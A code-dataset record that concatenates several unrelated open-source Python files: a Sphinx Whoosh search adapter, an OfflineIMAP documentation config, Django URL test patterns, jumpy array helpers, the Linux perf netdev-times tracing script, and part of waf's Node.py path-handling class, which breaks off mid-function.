mock_mkdtemp.call_args[1]['prefix'].startswith("ansible-moduletmp-")
neumerance/cloudloon2
refs/heads/master
.venv/lib/python2.7/site-packages/sphinx/websupport/search/whooshsearch.py
5
# -*- coding: utf-8 -*- """ sphinx.websupport.search.whooshsearch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Whoosh search adapter. :copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS. :license: BSD, see LICENSE for details. """ from whoosh import index from whoosh.fields import Schema, ID, TEXT from whoosh.qparser import QueryParser from whoosh.analysis import StemmingAnalyzer from sphinx.util.osutil import ensuredir from sphinx.websupport.search import BaseSearch class WhooshSearch(BaseSearch): """The whoosh search adapter for sphinx web support.""" # Define the Whoosh Schema for the search index. schema = Schema(path=ID(stored=True, unique=True), title=TEXT(field_boost=2.0, stored=True), text=TEXT(analyzer=StemmingAnalyzer(), stored=True)) def __init__(self, db_path): ensuredir(db_path) if index.exists_in(db_path): self.index = index.open_dir(db_path) else: self.index = index.create_in(db_path, schema=self.schema) self.qparser = QueryParser('text', self.schema) def init_indexing(self, changed=[]): for changed_path in changed: self.index.delete_by_term('path', changed_path) self.index_writer = self.index.writer() def finish_indexing(self): self.index_writer.commit() def add_document(self, pagename, title, text): self.index_writer.add_document(path=unicode(pagename), title=title, text=text) def handle_query(self, q): searcher = self.index.searcher() whoosh_results = searcher.search(self.qparser.parse(q)) results = [] for result in whoosh_results: context = self.extract_context(result['text']) results.append((result['path'], result.get('title', ''), context)) return results
thomasf/offlineimap
refs/heads/master
docs/doc-src/conf.py
9
# -*- coding: utf-8 -*- # # pyDNS documentation build configuration file, created by # sphinx-quickstart on Tue Feb 2 10:00:47 2010. # # This file is execfile()d with the current directory set to its containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys, os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('../..')) from offlineimap import __version__, __bigversion__, __author__, __copyright__ # -- General configuration ----------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.viewcode'] autoclass_content = "both" # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8' # The master toctree document. master_doc = 'index' # General information about the project. project = u'OfflineIMAP' copyright = __copyright__ # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = __version__ # The full version, including alpha/beta/rc tags. release = __bigversion__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. #unused_docs = [] # List of directories, relative to source directory, that shouldn't be searched # for source files. exclude_trees = [] # The reST default role (used for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = False # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output --------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. html_theme = 'default' #html_style = '' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". #html_static_path = ['html'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. html_use_modindex = False # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '' # Output file base name for HTML help builder. htmlhelp_basename = 'dev-doc' # -- Options for LaTeX output -------------------------------------------------- # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass [howto/manual]). latex_documents = [ ('index', 'offlineimap.tex', u'OfflineIMAP Documentation', u'OfflineIMAP contributors', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_use_modindex = True # Example configuration for intersphinx: refer to the Python standard library. intersphinx_mapping = {'http://docs.python.org/': None}
loic/django
refs/heads/master
tests/urlpatterns_reverse/included_app_urls.py
405
from django.conf.urls import url from . import views app_name = 'inc-app' urlpatterns = [ url(r'^normal/$', views.empty_view, name='inc-normal-view'), url(r'^normal/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='inc-normal-view'), url(r'^\+\\\$\*/$', views.empty_view, name='inc-special-view'), url(r'^mixed_args/([0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='inc-mixed-args'), url(r'^no_kwargs/([0-9]+)/([0-9]+)/$', views.empty_view, name='inc-no-kwargs'), url(r'^view_class/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.view_class_instance, name='inc-view-class'), ]
RobAltena/deeplearning4j
refs/heads/master
jumpy/jumpy/matlib.py
2
################################################################################ # Copyright (c) 2015-2018 Skymind, Inc. # # This program and the accompanying materials are made available under the # terms of the Apache License, Version 2.0 which is available at # https://www.apache.org/licenses/LICENSE-2.0. # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # # SPDX-License-Identifier: Apache-2.0 ################################################################################ from .ndarray import ndarray from .java_classes import Nd4j def zeros(shape): return ndarray(Nd4j.zeros(*shape)) def ones(shape): return ndarray(Nd4j.ones(*shape)) def zeros_like(array): array = ndarray(array).array return ndarray(Nd4j.zerosLike(array)) def ones_like(array): array = ndarray(array).array return ndarray(Nd4j.onesLike(array)) def eye(size): return ndarray(Nd4j.eye(size)) def arange(m, n=None): if n is None: return ndarray(Nd4j.arange(m)) return ndarray(Nd4j.arange(m, n)) def linspace(start, stop, num): return ndarray(Nd4j.linspace(start, stop, num))
xcstacy/kernel-N8000
refs/heads/master
tools/perf/scripts/python/netdev-times.py
11271
# Display a process of packets and processed time. # It helps us to investigate networking or network device. # # options # tx: show only tx chart # rx: show only rx chart # dev=: show only thing related to specified device # debug: work with debug mode. It shows buffer status. import os import sys sys.path.append(os.environ['PERF_EXEC_PATH'] + \ '/scripts/python/Perf-Trace-Util/lib/Perf/Trace') from perf_trace_context import * from Core import * from Util import * all_event_list = []; # insert all tracepoint event related with this script irq_dic = {}; # key is cpu and value is a list which stacks irqs # which raise NET_RX softirq net_rx_dic = {}; # key is cpu and value include time of NET_RX softirq-entry # and a list which stacks receive receive_hunk_list = []; # a list which include a sequence of receive events rx_skb_list = []; # received packet list for matching # skb_copy_datagram_iovec buffer_budget = 65536; # the budget of rx_skb_list, tx_queue_list and # tx_xmit_list of_count_rx_skb_list = 0; # overflow count tx_queue_list = []; # list of packets which pass through dev_queue_xmit of_count_tx_queue_list = 0; # overflow count tx_xmit_list = []; # list of packets which pass through dev_hard_start_xmit of_count_tx_xmit_list = 0; # overflow count tx_free_list = []; # list of packets which is freed # options show_tx = 0; show_rx = 0; dev = 0; # store a name of device specified by option "dev=" debug = 0; # indices of event_info tuple EINFO_IDX_NAME= 0 EINFO_IDX_CONTEXT=1 EINFO_IDX_CPU= 2 EINFO_IDX_TIME= 3 EINFO_IDX_PID= 4 EINFO_IDX_COMM= 5 # Calculate a time interval(msec) from src(nsec) to dst(nsec) def diff_msec(src, dst): return (dst - src) / 1000000.0 # Display a process of transmitting a packet def print_transmit(hunk): if dev != 0 and hunk['dev'].find(dev) < 0: return print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \ (hunk['dev'], hunk['len'], nsecs_secs(hunk['queue_t']), nsecs_nsecs(hunk['queue_t'])/1000, diff_msec(hunk['queue_t'], hunk['xmit_t']), diff_msec(hunk['xmit_t'], hunk['free_t'])) # Format for displaying rx packet processing PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)" PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)" PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)" PF_JOINT= " |" PF_WJOINT= " | |" PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)" PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)" PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)" PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)" PF_CONS_SKB= " | consume_skb(+%.3fmsec)" # Display a process of received packets and interrputs associated with # a NET_RX softirq def print_receive(hunk): show_hunk = 0 irq_list = hunk['irq_list'] cpu = irq_list[0]['cpu'] base_t = irq_list[0]['irq_ent_t'] # check if this hunk should be showed if dev != 0: for i in range(len(irq_list)): if irq_list[i]['name'].find(dev) >= 0: show_hunk = 1 break else: show_hunk = 1 if show_hunk == 0: return print "%d.%06dsec cpu=%d" % \ (nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu) for i in range(len(irq_list)): print PF_IRQ_ENTRY % \ (diff_msec(base_t, irq_list[i]['irq_ent_t']), irq_list[i]['irq'], irq_list[i]['name']) print PF_JOINT irq_event_list = irq_list[i]['event_list'] for j in range(len(irq_event_list)): irq_event = irq_event_list[j] if irq_event['event'] == 'netif_rx': print PF_NET_RX % \ (diff_msec(base_t, irq_event['time']), irq_event['skbaddr']) print PF_JOINT print PF_SOFT_ENTRY % \ diff_msec(base_t, hunk['sirq_ent_t']) print PF_JOINT event_list = hunk['event_list'] for i in range(len(event_list)): event = event_list[i] if event['event_name'] == 'napi_poll': print PF_NAPI_POLL % \ (diff_msec(base_t, event['event_t']), event['dev']) if i == len(event_list) - 1: print "" else: print PF_JOINT else: print PF_NET_RECV % \ (diff_msec(base_t, event['event_t']), event['skbaddr'], event['len']) if 'comm' in event.keys(): print PF_WJOINT print PF_CPY_DGRAM % \ (diff_msec(base_t, event['comm_t']), event['pid'], event['comm']) elif 'handle' in event.keys(): print PF_WJOINT if event['handle'] == "kfree_skb": print PF_KFREE_SKB % \ (diff_msec(base_t, event['comm_t']), event['location']) elif event['handle'] == "consume_skb": print PF_CONS_SKB % \ diff_msec(base_t, event['comm_t']) print PF_JOINT def trace_begin(): global show_tx global show_rx global dev global debug for i in range(len(sys.argv)): if i == 0: continue arg = sys.argv[i] if arg == 'tx': show_tx = 1 elif arg =='rx': show_rx = 1 elif arg.find('dev=',0, 4) >= 0: dev = arg[4:] elif arg == 'debug': debug = 1 if show_tx == 0 and show_rx == 0: show_tx = 1 show_rx = 1 def trace_end(): # order all events in time all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME], b[EINFO_IDX_TIME])) # process all events for i in range(len(all_event_list)): event_info = all_event_list[i] name = event_info[EINFO_IDX_NAME] if name == 'irq__softirq_exit': handle_irq_softirq_exit(event_info) elif name == 'irq__softirq_entry': handle_irq_softirq_entry(event_info) elif name == 'irq__softirq_raise': handle_irq_softirq_raise(event_info) elif name == 'irq__irq_handler_entry': handle_irq_handler_entry(event_info) elif name == 'irq__irq_handler_exit': handle_irq_handler_exit(event_info) elif name == 'napi__napi_poll': handle_napi_poll(event_info) elif name == 'net__netif_receive_skb': handle_netif_receive_skb(event_info) elif name == 'net__netif_rx': handle_netif_rx(event_info) elif name == 'skb__skb_copy_datagram_iovec': handle_skb_copy_datagram_iovec(event_info) elif name == 'net__net_dev_queue': handle_net_dev_queue(event_info) elif name == 'net__net_dev_xmit': handle_net_dev_xmit(event_info) elif name == 'skb__kfree_skb': handle_kfree_skb(event_info) elif name == 'skb__consume_skb': handle_consume_skb(event_info) # display receive hunks if show_rx: for i in range(len(receive_hunk_list)): print_receive(receive_hunk_list[i]) # display transmit hunks if show_tx: print " dev len Qdisc " \ " netdevice free" for i in range(len(tx_free_list)): print_transmit(tx_free_list[i]) if debug: print "debug buffer status" print "----------------------------" print "xmit Qdisc:remain:%d overflow:%d" % \ (len(tx_queue_list), of_count_tx_queue_list) print "xmit netdevice:remain:%d overflow:%d" % \ (len(tx_xmit_list), of_count_tx_xmit_list) print "receive:remain:%d overflow:%d" % \ (len(rx_skb_list), of_count_rx_skb_list) # called from perf, when it finds a correspoinding event def irq__softirq_entry(name, context, cpu, sec, nsec, pid, comm, vec): if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX": return event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec) all_event_list.append(event_info) def irq__softirq_exit(name, context, cpu, sec, nsec, pid, comm, vec): if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX": return event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec) all_event_list.append(event_info) def irq__softirq_raise(name, context, cpu, sec, nsec, pid, comm, vec): if symbol_str("irq__softirq_entry", "vec", vec) != "NET_RX": return event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, vec) all_event_list.append(event_info) def irq__irq_handler_entry(name, context, cpu, sec, nsec, pid, comm, irq, irq_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, irq_name) all_event_list.append(event_info) def irq__irq_handler_exit(name, context, cpu, sec, nsec, pid, comm, irq, ret): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, irq, ret) all_event_list.append(event_info) def napi__napi_poll(name, context, cpu, sec, nsec, pid, comm, napi, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, napi, dev_name) all_event_list.append(event_info) def net__netif_receive_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, dev_name) all_event_list.append(event_info) def net__netif_rx(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, dev_name) all_event_list.append(event_info) def net__net_dev_queue(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, dev_name) all_event_list.append(event_info) def net__net_dev_xmit(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen, rc, dev_name): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen, rc ,dev_name) all_event_list.append(event_info) def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr, protocol, location): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, protocol, location) all_event_list.append(event_info) def skb__consume_skb(name, context, cpu, sec, nsec, pid, comm, skbaddr): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr) all_event_list.append(event_info) def skb__skb_copy_datagram_iovec(name, context, cpu, sec, nsec, pid, comm, skbaddr, skblen): event_info = (name, context, cpu, nsecs(sec, nsec), pid, comm, skbaddr, skblen) all_event_list.append(event_info) def handle_irq_handler_entry(event_info): (name, context, cpu, time, pid, comm, irq, irq_name) = event_info if cpu not in irq_dic.keys(): irq_dic[cpu] = [] irq_record = {'irq':irq, 'name':irq_name, 'cpu':cpu, 'irq_ent_t':time} irq_dic[cpu].append(irq_record) def handle_irq_handler_exit(event_info): (name, context, cpu, time, pid, comm, irq, ret) = event_info if cpu not in irq_dic.keys(): return irq_record = irq_dic[cpu].pop() if irq != irq_record['irq']: return irq_record.update({'irq_ext_t':time}) # if an irq doesn't include NET_RX softirq, drop. if 'event_list' in irq_record.keys(): irq_dic[cpu].append(irq_record) def handle_irq_softirq_raise(event_info): (name, context, cpu, time, pid, comm, vec) = event_info if cpu not in irq_dic.keys() \ or len(irq_dic[cpu]) == 0: return irq_record = irq_dic[cpu].pop() if 'event_list' in irq_record.keys(): irq_event_list = irq_record['event_list'] else: irq_event_list = [] irq_event_list.append({'time':time, 'event':'sirq_raise'}) irq_record.update({'event_list':irq_event_list}) irq_dic[cpu].append(irq_record) def handle_irq_softirq_entry(event_info): (name, context, cpu, time, pid, comm, vec) = event_info net_rx_dic[cpu] = {'sirq_ent_t':time, 'event_list':[]} def handle_irq_softirq_exit(event_info): (name, context, cpu, time, pid, comm, vec) = event_info irq_list = [] event_list = 0 if cpu in irq_dic.keys(): irq_list = irq_dic[cpu] del irq_dic[cpu] if cpu in net_rx_dic.keys(): sirq_ent_t = net_rx_dic[cpu]['sirq_ent_t'] event_list = net_rx_dic[cpu]['event_list'] del net_rx_dic[cpu] if irq_list == [] or event_list == 0: return rec_data = {'sirq_ent_t':sirq_ent_t, 'sirq_ext_t':time, 'irq_list':irq_list, 'event_list':event_list} # merge information realted to a NET_RX softirq receive_hunk_list.append(rec_data) def handle_napi_poll(event_info): (name, context, cpu, time, pid, comm, napi, dev_name) = event_info if cpu in net_rx_dic.keys(): event_list = net_rx_dic[cpu]['event_list'] rec_data = {'event_name':'napi_poll', 'dev':dev_name, 'event_t':time} event_list.append(rec_data) def handle_netif_rx(event_info): (name, context, cpu, time, pid, comm, skbaddr, skblen, dev_name) = event_info if cpu not in irq_dic.keys() \ or len(irq_dic[cpu]) == 0: return irq_record = irq_dic[cpu].pop() if 'event_list' in irq_record.keys(): irq_event_list = irq_record['event_list'] else: irq_event_list = [] irq_event_list.append({'time':time, 'event':'netif_rx', 'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name}) irq_record.update({'event_list':irq_event_list}) irq_dic[cpu].append(irq_record) def handle_netif_receive_skb(event_info): global of_count_rx_skb_list (name, context, cpu, time, pid, comm, skbaddr, skblen, dev_name) = event_info if cpu in net_rx_dic.keys(): rec_data = {'event_name':'netif_receive_skb', 'event_t':time, 'skbaddr':skbaddr, 'len':skblen} event_list = net_rx_dic[cpu]['event_list'] event_list.append(rec_data) rx_skb_list.insert(0, rec_data) if len(rx_skb_list) > buffer_budget: rx_skb_list.pop() of_count_rx_skb_list += 1 def handle_net_dev_queue(event_info): global of_count_tx_queue_list (name, context, cpu, time, pid, comm, skbaddr, skblen, dev_name) = event_info skb = {'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time} tx_queue_list.insert(0, skb) if len(tx_queue_list) > buffer_budget: tx_queue_list.pop() of_count_tx_queue_list += 1 def handle_net_dev_xmit(event_info): global of_count_tx_xmit_list (name, context, cpu, time, pid, comm, skbaddr, skblen, rc, dev_name) = event_info if rc == 0: # NETDEV_TX_OK for i in range(len(tx_queue_list)): skb = tx_queue_list[i] if skb['skbaddr'] == skbaddr: skb['xmit_t'] = time tx_xmit_list.insert(0, skb) del tx_queue_list[i] if len(tx_xmit_list) > buffer_budget: tx_xmit_list.pop() of_count_tx_xmit_list += 1 return def handle_kfree_skb(event_info): (name, context, cpu, time, pid, comm, skbaddr, protocol, location) = event_info for i in range(len(tx_queue_list)): skb = tx_queue_list[i] if skb['skbaddr'] == skbaddr: del tx_queue_list[i] return for i in range(len(tx_xmit_list)): skb = tx_xmit_list[i] if skb['skbaddr'] == skbaddr: skb['free_t'] = time tx_free_list.append(skb) del tx_xmit_list[i] return for i in range(len(rx_skb_list)): rec_data = rx_skb_list[i] if rec_data['skbaddr'] == skbaddr: rec_data.update({'handle':"kfree_skb", 'comm':comm, 'pid':pid, 'comm_t':time}) del rx_skb_list[i] return def handle_consume_skb(event_info): (name, context, cpu, time, pid, comm, skbaddr) = event_info for i in range(len(tx_xmit_list)): skb = tx_xmit_list[i] if skb['skbaddr'] == skbaddr: skb['free_t'] = time tx_free_list.append(skb) del tx_xmit_list[i] return def handle_skb_copy_datagram_iovec(event_info): (name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info for i in range(len(rx_skb_list)): rec_data = rx_skb_list[i] if skbaddr == rec_data['skbaddr']: rec_data.update({'handle':"skb_copy_datagram_iovec", 'comm':comm, 'pid':pid, 'comm_t':time}) del rx_skb_list[i] return
joshpfosi/gbn
refs/heads/master
.waf-1.8.12-f00e5b53f6bbeab1384a38c9cc5d51f7/waflib/Node.py
11
#! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file import os,re,sys,shutil from waflib import Utils,Errors exclude_regs=''' **/*~ **/#*# **/.#* **/%*% **/._* **/CVS **/CVS/** **/.cvsignore **/SCCS **/SCCS/** **/vssver.scc **/.svn **/.svn/** **/BitKeeper **/.git **/.git/** **/.gitignore **/.bzr **/.bzrignore **/.bzr/** **/.hg **/.hg/** **/_MTN **/_MTN/** **/.arch-ids **/{arch} **/_darcs **/_darcs/** **/.intlcache **/.DS_Store''' split_path=Utils.split_path_unix split_path_cygwin=Utils.split_path_cygwin split_path_win32=Utils.split_path_win32 if sys.platform=='cygwin': split_path=split_path_cygwin elif Utils.is_win32: split_path=split_path_win32 class Node(object): dict_class=dict __slots__=('name','sig','children','parent','cache_abspath','cache_isdir','cache_sig') def __init__(self,name,parent): self.name=name self.parent=parent if parent: if name in parent.children: raise Errors.WafError('node %s exists in the parent files %r already'%(name,parent)) parent.children[name]=self def __setstate__(self,data): self.name=data[0] self.parent=data[1] if data[2]is not None: self.children=self.dict_class(data[2]) if data[3]is not None: self.sig=data[3] def __getstate__(self): return(self.name,self.parent,getattr(self,'children',None),getattr(self,'sig',None)) def __str__(self): return self.name def __repr__(self): return self.abspath() def __hash__(self): return id(self) def __eq__(self,node): return id(self)==id(node) def __copy__(self): raise Errors.WafError('nodes are not supposed to be copied') def read(self,flags='r',encoding='ISO8859-1'): return Utils.readf(self.abspath(),flags,encoding) def write(self,data,flags='w',encoding='ISO8859-1'): Utils.writef(self.abspath(),data,flags,encoding) def chmod(self,val): os.chmod(self.abspath(),val) def delete(self): try: try: if hasattr(self,'children'): shutil.rmtree(self.abspath()) else: os.remove(self.abspath()) except OSError ,e: if os.path.exists(self.abspath()): raise e finally: self.evict() def evict(self): del self.parent.children[self.name] def suffix(self): k=max(0,self.name.rfind('.')) return self.name[k:] def height(self): d=self val=-1 while d: d=d.parent val+=1 return val def listdir(self): lst=Utils.listdir(self.abspath()) lst.sort() return lst def mkdir(self): if getattr(self,'cache_isdir',None): return try: self.parent.mkdir() except OSError: pass if self.name: try: os.makedirs(self.abspath()) except OSError: pass if not os.path.isdir(self.abspath()): raise Errors.WafError('Could not create the directory %s'%self.abspath()) try: self.children except AttributeError: self.children=self.dict_class() self.cache_isdir=True def find_node(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] cur=self for x in lst: if x=='..': cur=cur.parent or cur continue try: ch=cur.children except AttributeError: cur.children=self.dict_class() else: try: cur=cur.children[x] continue except KeyError: pass cur=self.__class__(x,cur) try: os.stat(cur.abspath()) except OSError: cur.evict() return None ret=cur try: os.stat(ret.abspath()) except OSError: ret.evict() return None try: while not getattr(cur.parent,'cache_isdir',None): cur=cur.parent cur.cache_isdir=True except AttributeError: pass return ret def make_node(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] cur=self for x in lst: if x=='..': cur=cur.parent or cur continue if getattr(cur,'children',{}): if x in cur.children: cur=cur.children[x] continue else: cur.children=self.dict_class() cur=self.__class__(x,cur) return cur def search_node(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] cur=self for x in lst: if x=='..': cur=cur.parent or cur else: try: cur=cur.children[x] except(AttributeError,KeyError): return None return cur def path_from(self,node): c1=self c2=node c1h=c1.height() c2h=c2.height() lst=[] up=0 while c1h>c2h: lst.append(c1.name) c1=c1.parent c1h-=1 while c2h>c1h: up+=1 c2=c2.parent c2h-=1 while id(c1)!=id(c2): lst.append(c1.name) up+=1 c1=c1.parent c2=c2.parent if c1.parent: for i in range(up): lst.append('..') else: if lst and not Utils.is_win32: lst.append('') lst.reverse() return os.sep.join(lst)or'.' def abspath(self): try: return self.cache_abspath except AttributeError: pass if not self.parent: val=os.sep elif not self.parent.name: val=os.sep+self.name else: val=self.parent.abspath()+os.sep+self.name self.cache_abspath=val return val if Utils.is_win32: def abspath(self): try: return self.cache_abspath except AttributeError: pass if not self.parent: val='' elif not self.parent.name: val=self.name+os.sep else: val=self.parent.abspath().rstrip(os.sep)+os.sep+self.name self.cache_abspath=val return val def is_child_of(self,node): p=self diff=self.height()-node.height() while diff>0: diff-=1 p=p.parent return id(p)==id(node) def ant_iter(self,accept=None,maxdepth=25,pats=[],dir=False,src=True,remove=True): dircont=self.listdir() dircont.sort() try: lst=set(self.children.keys()) except AttributeError: self.children=self.dict_class() else: if remove: for x in lst-set(dircont): self.children[x].evict() for name in dircont: npats=accept(name,pats) if npats and npats[0]: accepted=[]in npats[0] node=self.make_node([name]) isdir=os.path.isdir(node.abspath()) if accepted: if isdir: if dir: yield node else: if src: yield node if getattr(node,'cache_isdir',None)or isdir: node.cache_isdir=True if maxdepth: for k in node.ant_iter(accept=accept,maxdepth=maxdepth-1,pats=npats,dir=dir,src=src,remove=remove): yield k raise StopIteration def ant_glob(self,*k,**kw): src=kw.get('src',True) dir=kw.get('dir',False) excl=kw.get('excl',exclude_regs) incl=k and k[0]or kw.get('incl','**') reflags=kw.get('ignorecase',0)and re.I def to_pat(s): lst=Utils.to_list(s) ret=[] for x in lst: x=x.replace('\\','/').replace('//','/') if x.endswith('/'): x+='**' lst2=x.split('/') accu=[] for k in lst2: if k=='**': accu.append(k) else: k=k.replace('.','[.]').replace('*','.*').replace('?','.').replace('+','\\+') k='^%s$'%k try: accu.append(re.compile(k,flags=reflags)) except Exception ,e: raise Errors.WafError("Invalid pattern: %s"%k,e) ret.append(accu) return ret def filtre(name,nn): ret=[] for lst in nn: if not lst: pass elif lst[0]=='**': ret.append(lst) if len(lst)>1: if lst[1].match(name): ret.append(lst[2:]) else: ret.append([]) elif lst[0].match(name): ret.append(lst[1:]) return ret def accept(name,pats): nacc=filtre(name,pats[0]) nrej=filtre(name,pats[1]) if[]in nrej: nacc=[] return[nacc,nrej] ret=[x for x in self.ant_iter(accept=accept,pats=[to_pat(incl),to_pat(excl)],maxdepth=kw.get('maxdepth',25),dir=dir,src=src,remove=kw.get('remove',True))] if kw.get('flat',False): return' '.join([x.path_from(self)for x in ret]) return ret def is_src(self): cur=self x=id(self.ctx.srcnode) y=id(self.ctx.bldnode) while cur.parent: if id(cur)==y: return False if id(cur)==x: return True cur=cur.parent return False def is_bld(self): cur=self y=id(self.ctx.bldnode) while cur.parent: if id(cur)==y: return True cur=cur.parent return False def get_src(self): cur=self x=id(self.ctx.srcnode) y=id(self.ctx.bldnode) lst=[] while cur.parent: if id(cur)==y: lst.reverse() return self.ctx.srcnode.make_node(lst) if id(cur)==x: return self lst.append(cur.name) cur=cur.parent return self def get_bld(self): cur=self x=id(self.ctx.srcnode) y=id(self.ctx.bldnode) lst=[] while cur.parent: if id(cur)==y: return self if id(cur)==x: lst.reverse() return self.ctx.bldnode.make_node(lst) lst.append(cur.name) cur=cur.parent lst.reverse() if lst and Utils.is_win32 and len(lst[0])==2 and lst[0].endswith(':'): lst[0]=lst[0][0] return self.ctx.bldnode.make_node(['__root__']+lst) def find_resource(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] node=self.get_bld().search_node(lst) if not node: self=self.get_src() node=self.find_node(lst) if node: if os.path.isdir(node.abspath()): return None return node def find_or_declare(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] node=self.get_bld().search_node(lst) if node: if not os.path.isfile(node.abspath()): node.sig=None node.parent.mkdir() return node self=self.get_src() node=self.find_node(lst) if node: if not os.path.isfile(node.abspath()): node.sig=None node.parent.mkdir() return node node=self.get_bld().make_node(lst) node.parent.mkdir() return node def find_dir(self,lst): if isinstance(lst,str): lst=[x for x in split_path(lst)if x and x!='.'] node=self.find_node(lst) try: if not os.path.isdir(node.abspath()): return None except(OSError,AttributeError): return None return node def change_ext(self,ext,ext_in=None): name=self.name if ext_in is None: k=name.rfind('.') if k>=0: name=name[:k]+ext else: name=name+ext else: name=name[:-len(ext_in)]+ext return self.parent.find_or_declare([name]) def bldpath(self): return 